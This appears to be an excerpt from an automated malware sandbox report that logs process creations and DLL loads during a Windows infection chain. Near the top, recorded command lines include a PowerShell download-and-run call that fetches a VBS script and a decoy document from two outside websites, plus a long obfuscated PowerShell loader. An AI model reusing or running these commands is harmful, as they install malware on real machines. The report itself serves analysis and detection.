                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc'Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\k9o5xs1hnem9ja8a.vbs" Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Public\pqg5u7vt.doc" /o ""Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumberJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Realitetsbehandler='Clairsentient';;$opdragerfunktion='Nikau';;$Amontilladoer='Brucellosis';;$Skuldret='Picker74';;$Supercanonisation=$host.Name; function Kommaernes($Outbidder){If ($Supercanonisation) {$Nedblndedes='Medbringe';$Brions=2;$Oakling=$Brions}do{$stratigrapher+=$Outbidder[$Oakling];$Oakling+=3} until(!$Outbidder[$Oakling])$stratigrapher}function Satsstatistikken($Vridning150){ .($misscribed) ($Vridning150)}$spitefullest=Kommaernes ' yn DEbyt.h. VW';$spitefullest+=Kommaernes 'abePeBU.CDiLPii eeD.n,vt';$gedeskindene=Kommaernes ',nMJ oP zU iA lCllCoa ./';$Amatren=Kommaernes ' aTTrl isIn1 C2';$Oaklingnddragelses='Sr[ FN.neChtDe. Bs DeSyR.vVArIKncUneNuP toE iBaNB.T,uMReA UnC APhgE EPrRn ]Bo:A : Hs oeFocGlUherM i Tt,yT P,krA,OSlT koo c rO FLGa= i$ Ca mGra DT MR rEM N';$gedeskindene+=Kommaernes 'A 5,e.Ov0 F(C WH,ibenOpdGlo w sS, GdNS TCh S 1Kw0py. R0Es;fu ReWByiD nFa6F,4Fl;O VaxSk6 w4Ou;Ot or ovS : .1S 3Fn1Sy.F 0gr)Pu FGBreDecP kBioly/Fa2 C0Cu1Be0Mo0Ko1Fe0Bl1 , FeF oi,er Ie afBkoA xCh/Bi1 i3Se1.a.Be0';$Enkemnds=Kommaernes ',uUStS eE ,Rac-BoaStg FE ,NTat';$Multilobulate=Kommaernes 'Knh,utCotS p CsCi: / /Glw.sw,owd .F tA,d.eeH jWab B.stcMeoAamFr/ nk ipox/ReRA eTai asEusFou,ne arPr. Gxn.s An B> ahPit BtHup sD :Mo/Ex/ w,ywT,wTa.Urf DtM sShe snSog,oi lnCeeK,e.yrM.sin.LacSko MmSk/djkFam D/TaROmeP.i sB s eu HePur O. ,xSus un';$Tunneling=Kommaernes 'Fo>';$misscribed=Kommaernes 'K,i xeGlx';$Allieres24='dalsnkning';$Medicates='\Dyrehospitalerne.Gra';Satsstatistikken (Kommaernes ' f$IsGDrl o eB uA.aLFa:Tre .VdeaInS TiOpoImNLeeA.rInS c=Re$EyEF.N NVT,:.aaGapUnp AdSlA ft A ,+ o$ mbee DSti Ic ha KTKoEGys');Satsstatistikken (Kommaernes 'In$.igKoLVaOOvbUnASwlOr: riInNStuJanMaCNiTHou VoblU SsSa= M$SlmbeU PlGlt Pi RLIlOLoblruM,l aaFot ZEAr.UdsFlPCrL Fi lt A(Ja$c,TImUBoNA,nK,ENel eIExNIngO,)');Satsstatistikken (Kommaernes $Oaklingnddragelses);$Multilobulate=$Inunctuous[0];$Pressurized=(Kommaernes 'Ci$TiGPolIsOTibU.ADrLf :Fod OeFofP rB O Tc k =S NS,eGiwMu-CyoWhBRyJ eArC Otdy AfSSvySpS HT GeOvm K. B$ResLePUnISyTBoE KF euFrlFaL eWis ,t');Satsstatistikken ($Pressurized);Satsstatistikken (Kommaernes 'De$Swd eUnfPar FoF c.rkH,. rHUle IaNad aePrrS,sDg[Tr$.aEF nTrkSue Sm TnMud sUn]S,=Fo$L gSte.edKve s UkSci anTadMae lnSee');$Stoikerne=Kommaernes 'S,$sod LeDyfI rNeo .ccakFa.VaDBroPaw anFrlLaoFoa TdC F ri,olBieDo(C $DaMtuu Kl Lt Oi Ol AoO b Iu ml naUotBieEr,.a$ ,H vnoi,xr,iv,ue plSubD,e fvSng HeEnlS sEneIlr,esPh)';$Hvirvelbevgelsers=$Evasioners;Satsstatistikken (Kommaernes ' o$ vGalLAnoN.b faGaL B: Sh uuAnsBaeE,RkoERadBre eSPr= F(UdTF.e ,SReTSi-DiP AviTG HSk Pr$ nhHiVwaIPrr.oVDeE,jL B CESivNogfoeFlLSvsJoe,crSpSSk)');while (!$huseredes) {Satsstatistikken (Kommaernes 'Uk$ jgAklpeoLabOdaI lEv:YaH LaA,lHusEkh uMagFygSke A=te$ReMU.iA,sDyt dnRek Pt') ;Satsstatistikken $Stoikerne;Satsstatistikken (Kommaernes 'Des .TMaaDrrSkt s- RJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: firewallapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
